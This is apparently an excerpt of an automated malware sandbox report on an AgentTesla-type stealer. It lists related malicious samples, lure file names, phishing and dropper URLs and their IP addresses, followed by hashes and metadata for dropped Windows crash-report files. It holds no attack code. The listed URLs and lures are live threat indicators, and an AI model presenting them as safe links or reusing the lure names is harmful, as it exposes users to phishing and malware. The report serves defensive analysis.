                                                    STATEMENT OF ACCOUNT DHL - 717036431.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    api.ipify.orgSecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    https://seniorservice.co.za/?banner_click=true&banner_id=16535&href=http://0173316598494355.822094.actual-media.ro/de/?id=anna.pohl@bacvb.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 172.67.74.152
                                                    swift copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    Shipping Documents.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    swift copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    http://t.co/QwLoYDFPoZGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.26.13.205
                                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.30974.7732.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    DHL Receipt_AWB 98996913276.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    bg.microsoft.map.fastly.nethttps://u33127076.ct.sendgrid.net/ls/click?upn=u001.Dd8nu0w4qSl621Cfl5NzldfyZqjD9RWJslL2MWwt7pDZEhaAcTHbAT3eWd4fAnA0vrf6npFQIFebeFGCrAnwiA-3D-3DfmjQ_R-2Flyyz82d9aOYqi4-2FHSXVn4q8KaU22YObPyTKvaTTvltLHJTsQx6vicSpweVOt1Q2PhJWPHHTxt6yAPEzhfNUDUG5D5ilhJHkL1NI-2BWX2-2BDDI93AOg7LpunA0BU-2BZBoDgn6A5Z8xcvffpNwXtypTCusIOi-2BlO0xNH4h8I6EM-2FpelF-2BaCcmwOfdvxekMe-2FJpx-2B7DaCkmWjXbM0S7yd7UfMQ-3D-3DGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    https://url.us.m.mimecastprotect.com/s/NqNQClYX45S1PxGimFEoZ?domain=urldefense.proofpoint.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 199.232.210.172
                                                    https://flow.page/dnjetsdocsGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://t.email.caixabank.com/r/?id=h53014a64,6db27ee6,f3bae0f&p1=tambatourism.jp/g/c3lsdmllLnJvbGxhbmRAYXNuLmNvbQ==Get hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    https://docomo3903-tatad0c0movsnl3932.000webhostapp.comGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://app.nyheder.danskespil.dk/e/f2?elqFormName=4ChangePermission&elqSiteID=414837471&DataSourceID=706382&emailPermission=0&redirect=https://kotobukitabi.com/s/anVlcmdlbi5zZWlkbGVyQGlwcm90ZXguZGU=Get hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://subscription-management.paddle.com/subscription/23736269/hash/48f17787dd06251c79832319a0cd81181e25b6488ec57eb96bdbfa63d118f311/manage-subscriptionGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://url.us.m.mimecastprotect.com/s/RBIeC68AD5iQ5EOspXJld?domain=urldefense.proofpoint.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 199.232.214.172
                                                    https://www.mirzbmy.cn/Get hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    https://www.ruptmnc.cn/Get hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    smtp.zoho.euINQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 185.230.214.164
                                                    VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                                                    • 185.230.214.164
                                                    RFQ_on_SAK-TC233L-32F200N_INFINEON_PN_PHARMA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 89.36.170.164
                                                    1qwF1J2Njh.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 185.230.212.164
                                                    N8USBRwo0Z.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 89.36.170.164
                                                    PURCHASE_ORDER.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                    • 89.36.170.164
                                                    New Enquiry List.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 185.20.209.164

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSSecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    y4UgZYdag6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 172.67.185.34
                                                    https://u33127076.ct.sendgrid.net/ls/click?upn=u001.Dd8nu0w4qSl621Cfl5NzldfyZqjD9RWJslL2MWwt7pDZEhaAcTHbAT3eWd4fAnA0vrf6npFQIFebeFGCrAnwiA-3D-3DfmjQ_R-2Flyyz82d9aOYqi4-2FHSXVn4q8KaU22YObPyTKvaTTvltLHJTsQx6vicSpweVOt1Q2PhJWPHHTxt6yAPEzhfNUDUG5D5ilhJHkL1NI-2BWX2-2BDDI93AOg7LpunA0BU-2BZBoDgn6A5Z8xcvffpNwXtypTCusIOi-2BlO0xNH4h8I6EM-2FpelF-2BaCcmwOfdvxekMe-2FJpx-2B7DaCkmWjXbM0S7yd7UfMQ-3D-3DGet hashmaliciousUnknownBrowse
                                                    • 162.159.61.3
                                                    https://url.us.m.mimecastprotect.com/s/NqNQClYX45S1PxGimFEoZ?domain=urldefense.proofpoint.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    http://rheodata.comGet hashmaliciousUnknownBrowse
                                                    • 172.67.185.53
                                                    https://flow.page/dnjetsdocsGet hashmaliciousUnknownBrowse
                                                    • 104.18.125.91
                                                    POX17265XSCB.xlsxGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.45
                                                    https://docomo3903-tatad0c0movsnl3932.000webhostapp.comGet hashmaliciousUnknownBrowse
                                                    • 104.18.11.207
                                                    https://subscription-management.paddle.com/subscription/23736269/hash/48f17787dd06251c79832319a0cd81181e25b6488ec57eb96bdbfa63d118f311/manage-subscriptionGet hashmaliciousUnknownBrowse
                                                    • 104.18.125.91
                                                    SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    COMPUTERLINEComputerlineSchlierbachSwitzerlandCHINQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 185.230.214.164
                                                    https://classic.dreamclass.io/pages/admissions/form/BvtxckGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.28
                                                    http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.28
                                                    https://workdrive.zohoexternal.com/external/2c63de0fdd4c89e3b1929ff054753df29586989db597aec11b0424839e9707da/downloadGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.52
                                                    https://survey.zohopublic.eu/zs/GzDXvpGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.230.212.19
                                                    https://site24x7.comGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.11
                                                    https://workdrive.zoho.eu/file/17s6p7fb7d86e6c7d46b790f74da739ebdd8dGet hashmaliciousUnknownBrowse
                                                    • 185.230.212.52
                                                    EGpGxFlJO8.exeGet hashmaliciousGlupteba, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                    • 89.36.170.166
                                                    VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                                                    • 185.230.214.164
                                                    https://mailer2.zohoinsights.eu/ck1/13ef.4aba358de/4652e940-cb13-11ee-af3c-525400b65433/894286b67613768b29c78076a31443d9fd7b902a/2?e=aMgNxARpVMrEefJgEKI5XWhw45Pz00VPkB6DgwAaNtbVO/bgaxrbvc49ksOMhPHJgbhA1KvMxdaWrLLDEbkMfIm9dE7WxdYmk3Lc%20xD0COY=Get hashmaliciousUnknownBrowse
                                                    • 185.230.212.184
                                                    TUT-ASUSQUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    Purchase Order - PO24108267.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 208.95.112.1
                                                    Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    _____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    DHL Receipt_AWB 98996913276.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    DHL Shipment Notification.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    STATEMENT OF ACCOUNT DHL - 717036431.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    https://flow.page/dnjetsdocsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    retroactive_effective_date_agreement.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    JGomKnothX.exeGet hashmaliciousQuasarBrowse
                                                    • 104.26.13.205
                                                    retroactive_effective_date_agreement.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    retroactive effective date agreement 96285.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    https://uww-reg.ru/tarjetaliderbci/superavance-nlpk/Get hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    retroactive effective date agreement 96285.jsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exePO454323 Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                        090998948.vbsGet hashmaliciousXWormBrowse
                                                          SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                                            FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                                              63762524.vbsGet hashmaliciousXWormBrowse
                                                                48727365.vbsGet hashmaliciousXWormBrowse
                                                                  329182736.vbsGet hashmaliciousXWormBrowse
                                                                    payment pdf.exeGet hashmaliciousAgentTesla, DarkTortilla, PureLog Stealer, RedLineBrowse
                                                                      FAC- IST9G4VW.exeGet hashmaliciousAgentTeslaBrowse

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_94d8de46975ebb84b7d7bf7439ceff3d8ebb342b_86edb7bf_473f79e4-0d6a-44ee-95d8-f8273cfab5ad\Report.wer

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.1675750929285134
                                                                        Encrypted:false
                                                                        SSDEEP:192:573RUnoSA5i0Vf7yGUhaWTO8LxQmIDzuiFZZ24lO83:NRUnoSYVf7y5haiO8BuzuiFZY4lO83
                                                                        MD5:B3C164B94D1EC66103971AE455C1DD6A
                                                                        SHA1:DEEED16BDA9227AF0CD3C6A748A678AB3C093A52
                                                                        SHA-256:524C691EF289F44F93A7C61F564C63788B719A7B1DC03E5481023CBF6D7C20AF
                                                                        SHA-512:65B1630E3C23CA462CC78297C7D3A4A3506D2A807253D5A498AD5B4588D6F91CCB9D34CCF5D781DAD16BEC579393874063CFFE0108BCE769CEC0C3D36A1AEAB1
                                                                        Malicious:false
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.6.2.5.5.8.8.1.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.7.1.9.4.9.4.5.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.3.f.7.9.e.4.-.0.d.6.a.-.4.4.e.e.-.9.5.d.8.-.f.8.2.7.3.c.f.a.b.5.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.5.8.7.3.2.6.-.b.2.d.7.-.4.d.1.b.-.a.7.7.1.-.4.5.4.1.f.2.d.c.0.a.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.0.-.0.0.0.1.-.0.0.1.4.-.d.0.e.9.-.5.a.4.4.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.

                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_daa74aecddff3d3c16abaa1f57c8bcbc853838bb_86edb7bf_12f9defd-974f-469a-b999-ce207f8d0863\Report.wer

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.1450276431159463
                                                                        Encrypted:false
                                                                        SSDEEP:192:P94w2gAS50uvdugaKTHyfKlibdzuiFZZ24lO8r:F4w2gIuvdVaMHk1ZzuiFZY4lO8r
                                                                        MD5:713B0D28902ADC7EC535E3D2A17F603D
                                                                        SHA1:FF470E3EA7185C3E42B54CBF289C48D2C03E1540
                                                                        SHA-256:A4412C68A5A0C9D6A69DE4593B4F52E1057253A32E4E87A5AFF4443B90498A44
                                                                        SHA-512:E4C48265437760DD27BA254315153D24F32CCCF5FED995045FA4CBC9CFBE19E4A118B6B064F1B9F877399708655083D8F3CC889CC83B0E68B1AB07C5D2C1F75E
                                                                        Malicious:false
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.6.7.7.5.0.4.8.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.6.8.8.1.2.9.9.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.f.9.d.e.f.d.-.9.7.4.f.-.4.6.9.a.-.b.9.9.9.-.c.e.2.0.7.f.8.d.0.8.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.f.b.d.7.f.3.-.7.0.5.3.-.4.9.9.6.-.b.f.4.5.-.7.7.b.6.3.d.3.c.0.6.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.c.0.-.0.0.0.1.-.0.0.1.4.-.0.c.4.1.-.b.c.4.5.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.

                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_daa74aecddff3d3c16abaa1f57c8bcbc853838bb_86edb7bf_190b559b-a032-42b3-ad83-88391fdb83ac\Report.wer

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.1448930736438263
                                                                        Encrypted:false
                                                                        SSDEEP:192:O0RAIgAS50uvdugaKTHyfKlibdzuiFZZ24lO8r:bRAIgIuvdVaMHk1ZzuiFZY4lO8r
                                                                        MD5:C26C07D5894ACC07A152A0CBD6C4A2B8
                                                                        SHA1:10774BC75B18955A3CDD186338FA42F1FAF3F829
                                                                        SHA-256:87EEC387341C747A50AC67B07D94E2BC2ECEB7D4C3127A7C1345A2B44E213E05
                                                                        SHA-512:E01268A3A7417B9325C5D7DFC7D76D090F22043009D4326F90C8F0D2F55F55D5DF28AA16644EC82ADD53242829197399E80C705638EAFA8D26A4E5E5394F6D02
                                                                        Malicious:false
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.8.1.5.0.2.0.2.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.8.4.4.3.9.5.2.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.0.b.5.5.9.b.-.a.0.3.2.-.4.2.b.3.-.a.d.8.3.-.8.8.3.9.1.f.d.b.8.3.a.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.4.4.0.e.7.e.-.0.a.4.0.-.4.5.d.a.-.a.e.5.f.-.f.5.9.5.5.d.b.9.6.2.f.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.0.c.c.-.0.0.0.1.-.0.0.1.4.-.5.d.5.4.-.2.4.5.0.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.

                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_daa74aecddff3d3c16abaa1f57c8bcbc853838bb_86edb7bf_270a125f-24b2-404d-ae84-f6ed04cd2eee\Report.wer

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.144635023285111
                                                                        Encrypted:false
                                                                        SSDEEP:192:K9ra6/gAS50uvdugaKTHyfKlibdzuiFZZ24lO8r:mra6gIuvdVaMHk1ZzuiFZY4lO8r
                                                                        MD5:F396BC4D254B5D118F5F8C14D1508FE5
                                                                        SHA1:213C3FD03836BA99508982ACD22D8FC467B2AAC9
                                                                        SHA-256:1184D2B46BCEA62346736FB938FF20868E53B17BA33A5DE2CC69F64F551C3557
                                                                        SHA-512:463181071D5C27107EC7B469256BCBCB693F225255DD570DE3E5DD190DCD0B79CCAF8A3FFFD66699EE7E2A481933D0CD334702F98E08ADC32E10A828D0C3858D
                                                                        Malicious:false
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.7.3.6.2.1.5.9.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.7.4.4.0.2.8.5.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.0.a.1.2.5.f.-.2.4.b.2.-.4.0.4.d.-.a.e.8.4.-.f.6.e.d.0.4.c.d.2.e.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.8.d.7.c.3.f.-.f.9.2.7.-.4.8.3.3.-.b.b.5.c.-.c.a.3.b.7.2.2.8.2.c.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.4.4.-.0.0.0.1.-.0.0.1.4.-.4.9.f.f.-.f.9.4.9.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA82A.tmp.dmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:04 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):508525
                                                                        Entropy (8bit):3.2824855377434616
                                                                        Encrypted:false
                                                                        SSDEEP:3072:uN0+aadLFQ3eeKW+4QNyBQhcSUy7339TRPHv9z1CCqnqpk1i23+vU1AtdN9tdN9P:uO+1dLy5+BRUAPHFrqn11i23Q
                                                                        MD5:985B7196D74CE1C3CCCC3CDE8B37FAB1
                                                                        SHA1:B8EDD13C6223805B2FB63D92C139A4477147FA5A
                                                                        SHA-256:02E14CBF70B8FDC606D96551711C6D0235A4EE80F4275B61E2DB784CB72B4D84
                                                                        SHA-512:2DA78F7F17266EFC2F7B77486E721057DBEEF4D83C1BEAEBA73201BD0D8A529A85BB5909D4B0C8E82CA2298B165815797F227F372AF209EE4BAF1127323C4785
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................H...........$....&...... ...0&.......U..............l.......8...........T........... ;..M...........PD..........<F..............................................................................eJ.......F......Lw......................T.......p....';f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC7D.tmp.dmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:08 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):502183
                                                                        Entropy (8bit):3.265670317393611
                                                                        Encrypted:false
                                                                        SSDEEP:3072:ShCe92iOMVk4IZO9ZjJvBCGa4+IcSLdyF61CCq9n13+vFFr8nluU:SEbFMkoGOJ7qd13Q8l
                                                                        MD5:D9D04D7059A2817DE881E3AC4D41F3CE
                                                                        SHA1:49214181E65BF1B35577941C0DBD01A05D13076E
                                                                        SHA-256:9FAFD24D63D4E8E09DB0D14E70451B1189C7ECFFA2B198CD2F614488FC039554
                                                                        SHA-512:B7D884317FC58245CB1E94BF4CA7D1E350B5C42F07DA20662F703082314F7B26FBDA50D741EEAC28454554CFF37E38F2EE63FE68AB6315B9AC8ADEB880A8ECBC
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................p...........$...4%...... ...X%.......P..............l.......8...........T............<...m..........xC..........dE..............................................................................eJ.......E......Lw......................T............';f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE34.tmp.WERInternalMetadata.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):6758
                                                                        Entropy (8bit):3.733112752237589
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJtj7ZdVY4Ad6J0Npro89bnWYf0sNm:R6lXJR7ZdVY44iknhf0L
                                                                        MD5:DF006D7694E7A10FDF29B75D1025ED9D
                                                                        SHA1:35C432D5A95AFC577FC7C5C391E892AF28BD2F46
                                                                        SHA-256:8BF62081110B1F7CD147CEB5A3983BABA597EF6C528D36D6F9EA2E920BC398DF
                                                                        SHA-512:FEE826813FE2DC06FE481D2D66693BCB64F160595112FA505549327DC97A4351EE2DA147B45A3C41C89DD77CD799C6687EB5DBFCD46E663F802CB11E6E03076B
                                                                        Malicious:false
